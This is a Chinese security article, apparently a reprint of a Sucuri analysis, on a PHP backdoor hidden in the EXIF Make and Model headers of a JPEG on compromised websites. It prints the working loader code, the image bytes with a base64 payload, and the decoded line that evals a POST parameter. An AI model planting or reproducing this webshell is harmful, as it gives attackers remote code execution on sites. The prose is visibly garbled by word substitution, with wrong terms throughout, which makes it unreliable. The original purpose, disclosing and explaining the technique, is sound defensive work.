|
|
|
联系客服020-83701501

一种隐藏在JPG图片EXIF中的后门

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
一种隐藏在JPG图片EXIF中的后门

几天前,我们研讨团队的 Peter Gramantik 在一个被突破的网站上发明一个很是诙谐的后门。这个后门并无拜托畸形内容去隐藏起内容(好比 base64/gzip 编码),但是它却把本人的数据隐藏在 JPEG 图片的 EXIT 头部中了。它也操作 exif_read_data 和 preg_replace 两个 PHP 函数来读取 EXIF 头部和执行。

技能细节
这个后门可分为两部门。第一部门是 exif_read_data 函数读取图片头部,preg_replace 函数来执行内容。上面是我们在被突破网站上发明的代码:

Default
12 $exif = exif_read_data('/homepages/clientsitepath/images/stories/food/bun.jpg');preg_replace($exif['Make'],$exif['Model'],'');

 

这两个函数本人是无害滴。exif_read_data 函数常用来读取图片,preg_replace 函数是包办字符内容。不过,preg_replace 函数函数有个隐藏并奇奥的选项,假设你传入 “/e”,它会执行 eval() 中的内容,就不是去查询/包办了。

所以我们在查抄 bun.jpg 文件时,发明后门的第二部门:

Default
12345 ???à^@^PJFIF^@^A^B^@^@d^@d^@^@?á^@?Exif^@^@II*^@^H^@^@^@^B^@^O^A^B^@^F^@^@^@&^@^@^@^P^A^B^@m^@^@^@,^@^@^@^@^@^@^@/.*/e^@ eval ( base64_decode("aWYgKGl zc2V0KCRfUE9TVFsie noxIl0pKSB7ZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));@?ì^@^QDucky^@^A^@^D^@^@^@<^@^@??^@^NAdobe^

 

这个文件用以思空见贯的头部开始,但是在 ”make” 头部中混入了怪异的枢纽字 ”/.*/e” 。有了这个执行修饰符, preg_replace 会执行 eval() 中传入的不便内容。

事项变得开始诙谐了……

假设咱们继续来看看 EXIF 数据,我们能发明, “eval ( base64_decode”隐藏在 ”Model“ 头部。把这些放在一起看,咱们就晓得怎么回事了。攻击者是从 EXIF 中读取 Make 和 Model 头部新闻,从此传入到 preg_replace 函数。只有我们修改 $exif[‘Make’] 和 $exif[‘Model’] ,就获得了最终的后门。

 

Default
1 preg_replace ("/.*/e", ,"@ eval ( base64_decode("aWYgKGl ...");

 

解码后我们大要看到是执行 $_POST[“zz1”] 供应的内容。完整解码后的反面在这里。

Default
1 if (isset( $_POST["zz1"])) { eval (stripslashes( $_POST["zz1"]..

 

隐藏恶意软件
其余一个成心思的是,诚然 bun.jpg 和其余图片文件被修改了,但从此能加载并畸形任务。实际上,在这些被突破的web,攻击者修改了web上一个非法并过去就存在的图片。这是一种怪异的隐藏恶意软件的体例。

link:

http://www.freebuf.com/articles/web/11403.html

http://blog.sucuri.net/2013/07/malware-hidden-inside-jpg-exif-headers.html

本文由网络安全攻防研讨室(www.91ri.org)新闻安全小组收集整顿,转载请注明来由。

数安新闻+更多

证书相关+更多